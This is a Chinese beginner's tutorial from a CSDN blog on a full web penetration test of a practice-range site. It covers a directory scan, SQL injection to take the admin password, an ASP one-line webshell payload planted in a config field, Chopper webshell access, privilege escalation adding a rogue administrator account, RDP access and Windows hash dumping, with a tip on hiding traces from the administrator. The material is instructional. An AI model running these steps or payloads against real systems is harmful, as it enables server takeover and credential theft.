注:文章首发自合天智汇微信公众平台

0x01:本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透测试网站的不可或缺的利器之一。

另:面向学生的CTF,出题者考虑到学生的实操能力,设计的web题,或者拿服务器找flag的大题大部分用本文介绍的思路、工具就能成功cpature the flag。

说明:此次环境来自某网站的靶场,因为比较经典,所以 笔者将以此为例介绍web渗透测试中需要涉及的套路、工具等。网络安全法出来了,刚入门的小白就不要去动真实的网站了,不然真是从入门到入狱了。

场景模拟:此刻你已获权测试某网站,你将在接下来的一段时间里进行测试,注意不要泄露网站敏感数据,所以接下里的所有图片将会以打码方式呈现

准备工作:

准备好以下工具:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等

拿到一个网站,首先我们最容易想到的就是扫描目录。

最常用的工具是御剑,页面如图

在域名空格中输入我们测试的网站的域名,点击开始扫描即可

我们在结果中发现/admin,这疑似后台页面,双击该链接进入,看看判断是否正确

可以看到确实是后台登陆页面

找到后台登陆界面了,接下来我们就需要登陆的用户名和密码了,所以寻找用户名和密码就是我们下一步的工作

这一步我们用到的工具是Domain3.6,界面如图

点击SQL注入—》批量扫描注入点—》添加网址,输入网址

点击OK,然后点击批量分析注入点

得到结果如图

点击OK关闭弹窗,在注入点栏目下随机选择一条,右击选择“检测注入”

如图所示

点击“开始检测”,得到结果如图

点击“猜解表名”

在结果中选择admin

选中admin后点击猜解列名

得到结果如图

Username,password是我们需要的信息,所以在前面的方框中勾选,点击猜解内容,如下图

结果如下图,成功得到用户名和密

不过密码很明显是md5加密后的

我们在Md5在线解密网站中解密即可

得到结果,明文密码为admin888

现在有了用户名和密码,我们就返回后台登陆页面

输入信息后成功登陆

成功进入后台

接下来我们需要获取webshell,这一步仁者见仁智者见智,需要凭借个人的经验来多次尝试分析确定

此处仅提供个人思路

我们点击左侧的“系统设置管理”—》“网站信息配置”

在公司名称处将原信息删除,换成我们的一句话木马

“%><%Eval Request(Chr(35))%><%’

(解释:1.句首和句尾的引号用于闭合语句,2.Request()中的内容即连接菜刀时需要的密码,此处用的Chr(35)指的是ascii值为35的符号,即#,3.Eval Request()是asp一句话木马的常用格式)

点击保存设置

接下来的步骤是连接菜刀

打开菜刀,界面如图

在空白处右键,添加,在弹出框中输入地址及密码(之前说过为#

这里小白白们可能会问了,为什么地址后面的/inc/config.asp之前没有见过呢?

是这样的,这个网站用的是魅力企业网站管理系统(一个cms),我们可以在网上下到它的源码,可以看到它整个的目录结构,自然会明白我们修改的一句话的目录在/inc/config.asp

输入信息后点击添加,发现连接成功

注意:一般的CTF比赛,做到这个程度就可以在各个目录里找flag了,不过这次我们把整个渗透流程介绍完

接下来我们需要提权,那么就需要通过菜刀上传提权工具,这里上传的位置要选好,一般而言,c盘的子目录中的文件可执行的可能性较大

提权经典的搭配是cmd+3389+pr,我们这里就用这个组合,同时选定上传目录为C:\RECYCLER

直接将我们需要用到的工具pr,3389,cmd选中后拖进即可

可以看到已经上传成功

选中cmd,右击选择虚拟终端,打开如图所示页面

敲回车后开始输入我们的命令

来切换到我们提权工具所在的目录

我们开始使用pr创建用户,用法如图

注意,虽然pr “net user yale 888 /add”执行后提示命令成功完成,为了确认,我们可以输入pr “net user”确保确实成功添加该用户(用户名yale,密码888)

接下来我们尝试将yale添加到系统管理员组

同理,第二条命令是为了确保添加成功

既然添加成功了,我们接下来就开启3389

我们win+r,打开运行框后输入mstsc,打开远程桌面连接

在空白框中输入ip即可开始连接

点击连接后弹出认证界面,输入我们创建的用户名和密码

点击确定即可成功登陆

接下来我们需要想到这个问题:以后远程登陆难道及靠我们自己创建的帐号吗?要是哪天被管理员发现了,那怎么办,所以长久之计是在获取系统管理员的密码后删除自己创建的用户

那么,接下里我们要做的就是找到系统管理员的密码

我们这里用到的工具是quarksdump,还是和前三个工具一样,拖到菜刀里直接上传

我们在远程连接的服务器中打开cmd窗口

进入recycler目录看到工具已上传

输入quarkspwdump.exe回车后立刻弹出如下窗口

输入如图命令,回车即可得到

我们看到最下面一列是Administrators跟随的一串字符,这其实也是一串hash加密过的密码值(Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值),解密得到

密码为cu9e2cgw

渗透测试结束。

此刻不要忘了按照规范整理一套完整的安全报告以及可行的修补建议并提交给甲方。

0x03 
总结:一次典型的渗透测试的过程就是如上所示,主要思路为

扫后台—找注入点获取后台登陆密码—上传一句话木马—菜刀连接—提权—拿服务器获取系统管理员密码

用到的工具有:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等

本文仅做技术分享及普及渗透流程之用,如有人企图以此来进行不合法的渗透等破坏网络安全的行为与本文作者无关,特此声明
--------------------- 
作者:Neil-Yale 
来源:CSDN 
原文:https://blog.csdn.net/yalecaltech/article/details/77476980 
版权声明:本文为博主原创文章,转载请附上博文链接!

Web渗透测试常规套路相关推荐

  1. kali Linux Web 渗透测试视频教程— 第六课 网络扫描-nmap与zmap

    Kali Linux Web 渗透测试视频教程- 第六课 网络扫描-nmap与zmap 文/玄魂 目录 Kali Linux Web 渗透测试视频教程- 第六课 网络扫描-nmap与zmap. 1 N ...

  2. Kali Linux Web 渗透测试— 第十二课-websploit

    Kali Linux Web 渗透测试- 第十二课-websploit 文/玄魂 目录 Kali Linux Web 渗透测试- 第十二课-websploit..................... ...

  3. 轻量级Web渗透测试工具jSQL

    轻量级Web渗透测试工具jSQL jSQL是Kali集成的一款轻量级的Web渗透测试工具.最初该工具主要实施SQL注入,后来增加更多的功能,扩展形成一个综合性的Web渗透测试工具.Kali提供的版本较 ...

  4. kali linux 2.0 web 渗透测试 电子书

    原创 2017-05-31 玄魂工作室 玄魂工作室 打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待. 求资料的同学,没有及时回复的,请再次留言,我会尽快处理.今天分享两本电子书 ...

  5. Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过

    Kali Linux Web 渗透测试视频教程-第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...

  6. 软件测试:web渗透测试怎样入门!讲透了...

    一.简介 1.web渗透测试概述 渗透测试:模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法. web渗透测试:只针对web应用的渗透测试 2.常见web安全漏洞 1.输入输出验证不充分 ...

  7. 什么是Web渗透测试

    什么是Web渗透测试 渗透测试( Penetration Test)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节.渗透测试能够直观的让管理人员知道 ...

  8. web渗透测试实战-SQLMAP

    一.实验项目名称 web渗透测试实战-SQLMAP 二.实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用. 1.获取数据库信息:数据库漏洞.数据库名.数据库版本等 python sql ...

  9. web渗透测试学习路径图

    Web渗透测试学习路线 一.基础知识 1.1 网络协议 <图解http> 1.2 编程语言 python 30 days for python go 1.3 Linux/Bash Over ...

最新文章

  1. 表单之label标签
  2. NSubstitute完全手册(二)创建替代实例
  3. Transaction And Lock--事务中使用return会回滚事务吗?
  4. python的语法类似php_PHP实现类似python__mian__=__name__来单独执行类文件
  5. 人民币贬值会让八类人损失惨重!有你吗?
  6. kali修改root密码
  7. Linux下捕捉信号
  8. html中点击 checkbox (radio也可以) 隐藏tr 或 展现tr
  9. python静态递归函数_Python递归函数
  10. SQL查询语句中的 limit offset(转 )
  11. ionic3 百度地图插件定位 问题
  12. spacemacs project设置
  13. 手机APP的常见功能测试用例
  14. 小型超市管理系统 C++面向对象
  15. 大数据有十大应用领域,看看你用到了哪个?
  16. 爬虫实战——爬取大麦网
  17. 可可私房菜:一个普通中国女孩的移动互联网创业经
  18. UCT树用于四子棋对抗实验
  19. Spring boot项目 maven多模块打包,子模块报错问题解决
  20. Win7 + ubuntu14.04 双系统

热门文章

  1. Firefox必备的24款web开发插件[转]
  2. asp.net页面回传与js调用服务端事件,Postback的原理
  3. MySQL入门 (三) : 运算式与函式
  4. Linux DVD 转 MP4 – HandBrake – Copy a DVD to MP4 or MKV file
  5. 减少HTTP请求(大型网站优化技术)
  6. K均值聚类关于初始聚类中心选取的一种改进(python程序)
  7. Go 标准库: path
  8. 如何用Pygame写游戏(二十)
  9. SOCK_STREAM和SOCK_DGRAM两种类型的区别
  10. Spring、SpringMVC、Spring Boot、Spring Cloud 概念、关系及区别